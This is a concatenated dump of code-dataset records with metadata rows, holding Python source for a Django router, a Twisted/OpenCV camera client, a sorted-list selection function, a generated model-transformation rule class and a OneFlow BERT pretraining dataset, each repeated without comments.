router.register('recipe', views.RecipeViewSet)
app_name = 'recipe'
urlpatterns = [
path('', include(router.urls))
]
| true
| true
|
790dc1ec4b631e70e3b7f9f8d7c83a86604e4e4a
| 4,903
|
py
|
Python
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | 1
|
2021-02-02T11:27:25.000Z
|
2021-02-02T11:27:25.000Z
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | 18
|
2021-02-01T11:35:15.000Z
|
2021-08-03T14:23:38.000Z
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | null | null | null |
# System Imports
import cv2
import json
from typing import Optional
# Library imports
import numpy
# Twisted Import
from twisted.internet import reactor, defer, threads, protocol
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.interfaces import IAddress
# Package Imports
from .data import Image, ColorSpace
class cv_webcam (object):
def __init__ (self, device, img_width, img_height):
self.device_index = device
self.img_width = img_width
self.img_height = img_height
self.name = "cv_webcam(%s)" % device
self.camera = None
@defer.inlineCallbacks
def connect (self, _protocolFactory):
if self.camera is None:
self.camera = yield threads.deferToThread(cv2.VideoCapture, self.device_index)
# Set picture capture dimensions
self.camera.set(3, self.img_width)
self.camera.set(4, self.img_height)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
"""
Get an image from the camera.
Returns an Image object.
"""
try:
flag, img_array = yield threads.deferToThread(self.camera.read)
except SystemError:
return
if flag is False:
print ("No image")
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
class _camera_proxy_protocol (protocol.Protocol):
_state: str
_buffer: bytes = b''
_image_callback: Optional[defer.Deferred] = None
_camera_id: Optional[bytes] = None
def setCameraId(self, camera_id: int):
self._camera_id = str(camera_id).encode()
self.requestFormat()
# def connectionMade(self):
# if self._camera_id is not None:
# self.requestFormat()
def dataReceived(self, data: bytes):
"""
Byte 1: command
Byte 2-5: length
Byte 6+: data
"""
self._buffer += data
if len(self._buffer) > 5:
command = chr(self._buffer[0])
length = int.from_bytes(self._buffer[1:5], byteorder = 'big')
if len(self._buffer) >= length + 5:
data = self._buffer[5 : 5 + length]
self._buffer = self._buffer[5 + length : ]
if command == 'F':
self.formatReceived(data)
elif command == 'I':
self.imageReceived(data)
def formatReceived (self, data: bytes):
image_format = json.loads(data.decode())
if image_format['channels'] == 1:
self._image_shape = (image_format['height'], image_format['width'])
else:
self._image_shape = (
image_format['height'],
image_format['width'],
image_format['channels']
)
self._image_colorspace = image_format['colorspace']
def imageReceived (self, data: bytes):
try:
img_data = numpy.reshape(
numpy.frombuffer(data, dtype = numpy.uint8),
newshape = self._image_shape
)
self._image_callback.callback(img_data)
except (AttributeError, defer.AlreadyCalledError) as e:
# No callback, or callback already done. (Unexpected image data).
pass
except Exception as e:
try:
self._image_callback.errback(e)
except defer.AlreadyCalledError:
pass
def requestFormat (self):
self.transport.write(b'F' + self._camera_id + b'\n')
def requestImage (self):
self._image_callback = defer.Deferred()
self.transport.write(b'I' + self._camera_id + b'\n')
return self._image_callback
class camera_proxy (object):
def __init__ (self, host, port, camera_id):
self.point = TCP4ClientEndpoint(reactor, host, port)
self.name = f"camera_proxy({host!s}, {port!s})"
self.camera_id = camera_id
@defer.inlineCallbacks
def connect (self, _protocolFactory):
self._protocol = yield self.point.connect(
protocol.Factory.forProtocol(_camera_proxy_protocol)
)
self._protocol.setCameraId(self.camera_id)
# yield self._protocol._get_format_information()
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
"""
Get an image from the camera.
Returns a SimpleCV Image.
"""
try:
img_array = yield self._protocol.requestImage()
except Exception as e:
print('Exception fetching image', e)
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
| 29.011834
| 90
| 0.598409
|
import cv2
import json
from typing import Optional
import numpy
from twisted.internet import reactor, defer, threads, protocol
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.interfaces import IAddress
from .data import Image, ColorSpace
class cv_webcam (object):
def __init__ (self, device, img_width, img_height):
self.device_index = device
self.img_width = img_width
self.img_height = img_height
self.name = "cv_webcam(%s)" % device
self.camera = None
@defer.inlineCallbacks
def connect (self, _protocolFactory):
if self.camera is None:
self.camera = yield threads.deferToThread(cv2.VideoCapture, self.device_index)
self.camera.set(3, self.img_width)
self.camera.set(4, self.img_height)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
try:
flag, img_array = yield threads.deferToThread(self.camera.read)
except SystemError:
return
if flag is False:
print ("No image")
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
class _camera_proxy_protocol (protocol.Protocol):
_state: str
_buffer: bytes = b''
_image_callback: Optional[defer.Deferred] = None
_camera_id: Optional[bytes] = None
def setCameraId(self, camera_id: int):
self._camera_id = str(camera_id).encode()
self.requestFormat()
def dataReceived(self, data: bytes):
self._buffer += data
if len(self._buffer) > 5:
command = chr(self._buffer[0])
length = int.from_bytes(self._buffer[1:5], byteorder = 'big')
if len(self._buffer) >= length + 5:
data = self._buffer[5 : 5 + length]
self._buffer = self._buffer[5 + length : ]
if command == 'F':
self.formatReceived(data)
elif command == 'I':
self.imageReceived(data)
def formatReceived (self, data: bytes):
image_format = json.loads(data.decode())
if image_format['channels'] == 1:
self._image_shape = (image_format['height'], image_format['width'])
else:
self._image_shape = (
image_format['height'],
image_format['width'],
image_format['channels']
)
self._image_colorspace = image_format['colorspace']
def imageReceived (self, data: bytes):
try:
img_data = numpy.reshape(
numpy.frombuffer(data, dtype = numpy.uint8),
newshape = self._image_shape
)
self._image_callback.callback(img_data)
except (AttributeError, defer.AlreadyCalledError) as e:
pass
except Exception as e:
try:
self._image_callback.errback(e)
except defer.AlreadyCalledError:
pass
def requestFormat (self):
self.transport.write(b'F' + self._camera_id + b'\n')
def requestImage (self):
self._image_callback = defer.Deferred()
self.transport.write(b'I' + self._camera_id + b'\n')
return self._image_callback
class camera_proxy (object):
def __init__ (self, host, port, camera_id):
self.point = TCP4ClientEndpoint(reactor, host, port)
self.name = f"camera_proxy({host!s}, {port!s})"
self.camera_id = camera_id
@defer.inlineCallbacks
def connect (self, _protocolFactory):
self._protocol = yield self.point.connect(
protocol.Factory.forProtocol(_camera_proxy_protocol)
)
self._protocol.setCameraId(self.camera_id)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
try:
img_array = yield self._protocol.requestImage()
except Exception as e:
print('Exception fetching image', e)
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
| true
| true
|
790dc1f7c437946d2beb40380f654fcc078627c4
| 742
|
py
|
Python
|
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
def get_the_ith_largest(s1: list, s2: list, i: int):
m = len(s1)
n = len(s2)
if i > m + n:
raise IndexError('list index out of range')
i -= 1
l1 = 0
r1 = i if m - 1 >= i else m - 1
while l1 <= r1:
c1 = (l1 + r1) // 2
c1_f = i - c1 - 1
c1_b = i - c1
if c1_f >= 0 and (c1_f >= n or s2[c1_f] > s1[c1]):
l1 = c1 + 1
elif 0 <= c1_b < n and s2[c1_b] < s1[c1]:
r1 = c1 - 1
else:
return s1[c1]
return get_the_ith_largest(s2, s1, i + 1)
if __name__ == '__main__':
s1_test = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
s2_test = [2, 3, 4, 6, 10, 20, 100]
print(get_the_ith_largest(s2_test, s1_test, 8))
| 25.586207
| 65
| 0.467655
|
def get_the_ith_largest(s1: list, s2: list, i: int):
m = len(s1)
n = len(s2)
if i > m + n:
raise IndexError('list index out of range')
i -= 1
l1 = 0
r1 = i if m - 1 >= i else m - 1
while l1 <= r1:
c1 = (l1 + r1) // 2
c1_f = i - c1 - 1
c1_b = i - c1
if c1_f >= 0 and (c1_f >= n or s2[c1_f] > s1[c1]):
l1 = c1 + 1
elif 0 <= c1_b < n and s2[c1_b] < s1[c1]:
r1 = c1 - 1
else:
return s1[c1]
return get_the_ith_largest(s2, s1, i + 1)
if __name__ == '__main__':
s1_test = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
s2_test = [2, 3, 4, 6, 10, 20, 100]
print(get_the_ith_largest(s2_test, s1_test, 8))
| true
| true
|
790dc2d561a18c3dd73fe88534f970fb94f4432e
| 2,498
|
py
|
Python
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HMM10_then1_IsolatedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HMM10_then1_IsolatedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HMM10_then1_IsolatedLHS, self).__init__(name='HMM10_then1_IsolatedLHS', num_nodes=0, edges=[])
# Add the edges
self.add_edges([])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'MM10_then1')
# Set the node attributes
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 43.068966
| 125
| 0.5004
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HMM10_then1_IsolatedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
self.is_compiled = True
super(HMM10_then1_IsolatedLHS, self).__init__(name='HMM10_then1_IsolatedLHS', num_nodes=0, edges=[])
self.add_edges([])
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'MM10_then1')
self["equations"] = []
def constraint(self, PreNode, graph):
return True
| true
| true
|
790dc41206388cb2bb9037ec3e469e9e586a2a2e
| 14,501
|
py
|
Python
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 55
|
2021-12-10T08:47:06.000Z
|
2022-03-28T09:02:15.000Z
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 106
|
2021-11-03T05:16:45.000Z
|
2022-03-31T06:16:23.000Z
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 13
|
2021-12-29T08:12:08.000Z
|
2022-03-28T06:59:45.000Z
|
# coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""dataset for bert."""
import collections
import math
import numpy as np
import oneflow as flow
from libai.data.data_utils import SentenceIndexedDataset
from libai.data.structures import DistTensorData, Instance
MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"])
def is_start_piece(piece):
"""Check if the current word piece is the starting piece (BERT)."""
# When a word has been split into
# WordPieces, the first token does not have any marker and any subsequence
# tokens are prefixed with ##. So whenever we see the ## token, we
# append it to the previous set of word indexes.
return not piece.startswith("##")
class BertDataset(flow.utils.data.Dataset):
"""Dataset containing sentence pairs for BERT training.
Each index corresponds to a randomly generated sentence pair.
Args:
tokenizer: Tokenizer to use.
data_prefix: Path to the training dataset.
indexed_dataset: Indexed dataset to use.
max_seq_length: Maximum length of the sequence. All values are padded to
this length. Defaults to 512.
mask_lm_prob: Probability to mask tokens. Defaults to 0.15.
short_seq_prob: Probability of producing a short sequence. Defaults to 0.0.
max_preds_per_seq: Maximum number of mask tokens in each sentence. Defaults to None.
seed: Seed for random number generator for reproducibility. Defaults to 1234.
binary_head: Specifies whether the underlying dataset
generates a pair of blocks along with a sentence_target or not.
Setting it to True assumes that the underlying dataset generates a
label for the pair of sentences which is surfaced as
sentence_target. Defaults to True.
"""
def __init__(
self,
tokenizer,
data_prefix,
indexed_dataset,
max_seq_length=512,
mask_lm_prob=0.15,
short_seq_prob=0.0,
max_preds_per_seq=None,
seed=1234,
binary_head=True,
):
self.seed = seed
self.mask_lm_prob = mask_lm_prob
self.max_seq_length = max_seq_length
self.short_seq_prob = short_seq_prob
self.binary_head = binary_head
if max_preds_per_seq is None:
max_preds_per_seq = math.ceil(max_seq_length * mask_lm_prob / 10) * 10
self.max_preds_per_seq = max_preds_per_seq
self.dataset = SentenceIndexedDataset(
data_prefix,
indexed_dataset,
max_seq_length=self.max_seq_length - 3,
short_seq_prob=self.short_seq_prob,
binary_head=self.binary_head,
)
self.tokenizer = tokenizer
self.vocab_id_list = list(tokenizer.get_vocab().values())
self.cls_id = tokenizer.cls_token_id
self.sep_id = tokenizer.sep_token_id
self.mask_id = tokenizer.mask_token_id
self.pad_id = tokenizer.pad_token_id
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
# Note that this rng state should be numpy and not python since
# python randint is inclusive whereas the numpy one is exclusive.
np_rng = np.random.RandomState(seed=(self.seed + idx))
sents = self.dataset[idx]
if self.binary_head:
tokens_a, tokens_b, is_next_random = self.create_random_sentence_pair(sents, np_rng)
else:
tokens_a = []
for j in range(len(sents)):
tokens_a.extend(sents[j])
tokens_b = []
is_next_random = False
tokens_a, tokens_b = self.truncate_seq_pair(
tokens_a, tokens_b, self.max_seq_length - 3, np_rng
)
tokens, token_types = self.create_tokens_and_token_types(tokens_a, tokens_b)
tokens, masked_positions, masked_labels = self.create_masked_lm_predictions(tokens, np_rng)
(
tokens,
token_types,
labels,
padding_mask,
loss_mask,
) = self.pad_and_convert_to_tensor(tokens, token_types, masked_positions, masked_labels)
sample = Instance(
input_ids=DistTensorData(tokens),
attention_mask=DistTensorData(padding_mask),
tokentype_ids=DistTensorData(token_types),
ns_labels=DistTensorData(
flow.tensor(int(is_next_random), dtype=flow.long), placement_idx=-1
),
lm_labels=DistTensorData(labels, placement_idx=-1),
loss_mask=DistTensorData(loss_mask, placement_idx=-1),
)
return sample
def create_random_sentence_pair(self, sample, np_rng):
num_sentences = len(sample)
assert num_sentences > 1, "make sure each sample has at least two sentences."
a_end = 1
if num_sentences >= 3:
a_end = np_rng.randint(1, num_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
tokens_b = []
for j in range(a_end, num_sentences):
tokens_b.extend(sample[j])
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
def truncate_seq_pair(self, tokens_a, tokens_b, max_num_tokens, np_rng):
"""Truncate sequence pair to a maximum sequence length."""
len_a, len_b = len(tokens_a), len(tokens_b)
while True:
total_length = len_a + len_b
if total_length <= max_num_tokens:
break
if len_a > len_b:
trunc_tokens = tokens_a
len_a -= 1
else:
trunc_tokens = tokens_b
len_b -= 1
if np_rng.random() < 0.5:
trunc_tokens.pop(0) # remove the first element
else:
trunc_tokens.pop() # remove the last element
return tokens_a, tokens_b
def create_tokens_and_token_types(self, tokens_a, tokens_b):
"""Merge segments A and B, add [CLS] and [SEP] and build token types."""
tokens = [self.cls_id] + tokens_a + [self.sep_id]
token_types = [0] * (len(tokens_a) + 2)
if len(tokens_b) > 0:
tokens = tokens + tokens_b + [self.sep_id]
token_types = token_types + [1] * (len(tokens_b) + 1)
return tokens, token_types
def mask_token(self, idx, tokens, np_rng):
"""
Helper function to mask `idx` token from `tokens` according to
section 3.3.1 of https://arxiv.org/pdf/1810.04805.pdf
"""
label = tokens[idx]
if np_rng.random() < 0.8:
new_label = self.mask_id
else:
if np_rng.random() < 0.5:
new_label = label
else:
new_label = np_rng.choice(self.vocab_id_list)
tokens[idx] = new_label
return label
def create_masked_lm_predictions(
self,
tokens,
np_rng,
max_ngrams=3,
do_whole_word_mask=True,
favor_longer_ngram=False,
geometric_dist=False,
):
"""Creates the predictions for the masked LM objective.
Note: Tokens here are vocab ids and not text tokens."""
cand_indexes = []
token_boundary = [0] * len(tokens)
new_tokens = []
for (i, token) in enumerate(tokens):
new_tokens.append(token % len(self.tokenizer))
if token == self.cls_id or token == self.sep_id:
token_boundary[i] = 1
continue
# Whole Word Masking means that if we mask all of the wordpieces
# corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
if (
do_whole_word_mask
and len(cand_indexes) >= 1
and not is_start_piece(self.tokenizer._convert_id_to_token(token))
):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(self.tokenizer._convert_id_to_token(token)):
token_boundary[i] = 1
tokens = new_tokens
masked_positions = []
masked_labels = []
output_tokens = list(tokens)
if self.mask_lm_prob == 0:
return output_tokens, masked_positions, masked_labels
cand_indexes = []
for (i, token) in enumerate(tokens):
if token == self.cls_id or token == self.sep_id:
continue
# Whole Word Masking means that if we mask all of the wordpieces
# corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
if do_whole_word_mask and len(cand_indexes) >= 1 and token_boundary[i] == 0:
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
num_to_predict = min(
self.max_preds_per_seq, max(1, int(round(len(tokens) * self.mask_lm_prob)))
)
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
# By default, we set the probilities to favor shorter ngram sequences.
pvals = 1.0 / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx : idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
masked_lms = []
covered_indexes = set()
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[: len(cand_index_set)],
p=pvals[: len(cand_index_set)]
/ pvals[: len(cand_index_set)].sum(keepdims=True),
)
else:
# Sampling "n" from the geometric distribution and clipping it to
# the max_ngrams. Using p=0.2 default from the SpanBERT paper
# https://arxiv.org/pdf/1907.10529.pdf (Sec 3.1)
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# Repeatedly looking for a candidate that does not exceed the
# maximum number of predictions by trying shorter ngrams.
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
label = self.mask_token(index, output_tokens, np_rng)
masked_lms.append(MaskedLmInstance(index=index, label=label))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
for p in masked_lms:
masked_positions.append(p.index)
masked_labels.append(p.label)
return output_tokens, masked_positions, masked_labels
def pad_and_convert_to_tensor(self, tokens, token_types, masked_positions, masked_labels):
"""Pad sequences and convert them to tensor."""
# check
num_tokens = len(tokens)
num_pad = self.max_seq_length - num_tokens
assert num_pad >= 0
assert len(token_types) == num_tokens
assert len(masked_positions) == len(masked_labels)
# tokens and token types
filler = [self.pad_id] * num_pad
tokens = flow.tensor(tokens + filler, dtype=flow.long)
token_types = flow.tensor(token_types + filler, dtype=flow.long)
# padding mask
padding_mask = flow.tensor([1] * num_tokens + [0] * num_pad, dtype=flow.long)
# labels and loss mask
labels = [-1] * self.max_seq_length
loss_mask = [0] * self.max_seq_length
for idx, label in zip(masked_positions, masked_labels):
assert idx < num_tokens
labels[idx] = label
loss_mask[idx] = 1
labels = flow.tensor(labels, dtype=flow.long)
loss_mask = flow.tensor(loss_mask, dtype=flow.long)
return tokens, token_types, labels, padding_mask, loss_mask
@property
def supports_prefetch(self):
return self.dataset.supports_prefetch
def prefetch(self, indices):
self.dataset.prefetch(indices)
| 36.804569
| 99
| 0.603614
|
import collections
import math
import numpy as np
import oneflow as flow
from libai.data.data_utils import SentenceIndexedDataset
from libai.data.structures import DistTensorData, Instance
MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"])
def is_start_piece(piece):
_init__(
self,
tokenizer,
data_prefix,
indexed_dataset,
max_seq_length=512,
mask_lm_prob=0.15,
short_seq_prob=0.0,
max_preds_per_seq=None,
seed=1234,
binary_head=True,
):
self.seed = seed
self.mask_lm_prob = mask_lm_prob
self.max_seq_length = max_seq_length
self.short_seq_prob = short_seq_prob
self.binary_head = binary_head
if max_preds_per_seq is None:
max_preds_per_seq = math.ceil(max_seq_length * mask_lm_prob / 10) * 10
self.max_preds_per_seq = max_preds_per_seq
self.dataset = SentenceIndexedDataset(
data_prefix,
indexed_dataset,
max_seq_length=self.max_seq_length - 3,
short_seq_prob=self.short_seq_prob,
binary_head=self.binary_head,
)
self.tokenizer = tokenizer
self.vocab_id_list = list(tokenizer.get_vocab().values())
self.cls_id = tokenizer.cls_token_id
self.sep_id = tokenizer.sep_token_id
self.mask_id = tokenizer.mask_token_id
self.pad_id = tokenizer.pad_token_id
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
np_rng = np.random.RandomState(seed=(self.seed + idx))
sents = self.dataset[idx]
if self.binary_head:
tokens_a, tokens_b, is_next_random = self.create_random_sentence_pair(sents, np_rng)
else:
tokens_a = []
for j in range(len(sents)):
tokens_a.extend(sents[j])
tokens_b = []
is_next_random = False
tokens_a, tokens_b = self.truncate_seq_pair(
tokens_a, tokens_b, self.max_seq_length - 3, np_rng
)
tokens, token_types = self.create_tokens_and_token_types(tokens_a, tokens_b)
tokens, masked_positions, masked_labels = self.create_masked_lm_predictions(tokens, np_rng)
(
tokens,
token_types,
labels,
padding_mask,
loss_mask,
) = self.pad_and_convert_to_tensor(tokens, token_types, masked_positions, masked_labels)
sample = Instance(
input_ids=DistTensorData(tokens),
attention_mask=DistTensorData(padding_mask),
tokentype_ids=DistTensorData(token_types),
ns_labels=DistTensorData(
flow.tensor(int(is_next_random), dtype=flow.long), placement_idx=-1
),
lm_labels=DistTensorData(labels, placement_idx=-1),
loss_mask=DistTensorData(loss_mask, placement_idx=-1),
)
return sample
def create_random_sentence_pair(self, sample, np_rng):
num_sentences = len(sample)
assert num_sentences > 1, "make sure each sample has at least two sentences."
a_end = 1
if num_sentences >= 3:
a_end = np_rng.randint(1, num_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
tokens_b = []
for j in range(a_end, num_sentences):
tokens_b.extend(sample[j])
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
def truncate_seq_pair(self, tokens_a, tokens_b, max_num_tokens, np_rng):
len_a, len_b = len(tokens_a), len(tokens_b)
while True:
total_length = len_a + len_b
if total_length <= max_num_tokens:
break
if len_a > len_b:
trunc_tokens = tokens_a
len_a -= 1
else:
trunc_tokens = tokens_b
len_b -= 1
if np_rng.random() < 0.5:
trunc_tokens.pop(0)
else:
trunc_tokens.pop()
return tokens_a, tokens_b
def create_tokens_and_token_types(self, tokens_a, tokens_b):
tokens = [self.cls_id] + tokens_a + [self.sep_id]
token_types = [0] * (len(tokens_a) + 2)
if len(tokens_b) > 0:
tokens = tokens + tokens_b + [self.sep_id]
token_types = token_types + [1] * (len(tokens_b) + 1)
return tokens, token_types
def mask_token(self, idx, tokens, np_rng):
label = tokens[idx]
if np_rng.random() < 0.8:
new_label = self.mask_id
else:
if np_rng.random() < 0.5:
new_label = label
else:
new_label = np_rng.choice(self.vocab_id_list)
tokens[idx] = new_label
return label
def create_masked_lm_predictions(
self,
tokens,
np_rng,
max_ngrams=3,
do_whole_word_mask=True,
favor_longer_ngram=False,
geometric_dist=False,
):
cand_indexes = []
token_boundary = [0] * len(tokens)
new_tokens = []
for (i, token) in enumerate(tokens):
new_tokens.append(token % len(self.tokenizer))
if token == self.cls_id or token == self.sep_id:
token_boundary[i] = 1
continue
if (
do_whole_word_mask
and len(cand_indexes) >= 1
and not is_start_piece(self.tokenizer._convert_id_to_token(token))
):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(self.tokenizer._convert_id_to_token(token)):
token_boundary[i] = 1
tokens = new_tokens
masked_positions = []
masked_labels = []
output_tokens = list(tokens)
if self.mask_lm_prob == 0:
return output_tokens, masked_positions, masked_labels
cand_indexes = []
for (i, token) in enumerate(tokens):
if token == self.cls_id or token == self.sep_id:
continue
if do_whole_word_mask and len(cand_indexes) >= 1 and token_boundary[i] == 0:
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
num_to_predict = min(
self.max_preds_per_seq, max(1, int(round(len(tokens) * self.mask_lm_prob)))
)
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
pvals = 1.0 / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx : idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
masked_lms = []
covered_indexes = set()
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[: len(cand_index_set)],
p=pvals[: len(cand_index_set)]
/ pvals[: len(cand_index_set)].sum(keepdims=True),
)
else:
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
label = self.mask_token(index, output_tokens, np_rng)
masked_lms.append(MaskedLmInstance(index=index, label=label))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
for p in masked_lms:
masked_positions.append(p.index)
masked_labels.append(p.label)
return output_tokens, masked_positions, masked_labels
def pad_and_convert_to_tensor(self, tokens, token_types, masked_positions, masked_labels):
num_tokens = len(tokens)
num_pad = self.max_seq_length - num_tokens
assert num_pad >= 0
assert len(token_types) == num_tokens
assert len(masked_positions) == len(masked_labels)
filler = [self.pad_id] * num_pad
tokens = flow.tensor(tokens + filler, dtype=flow.long)
token_types = flow.tensor(token_types + filler, dtype=flow.long)
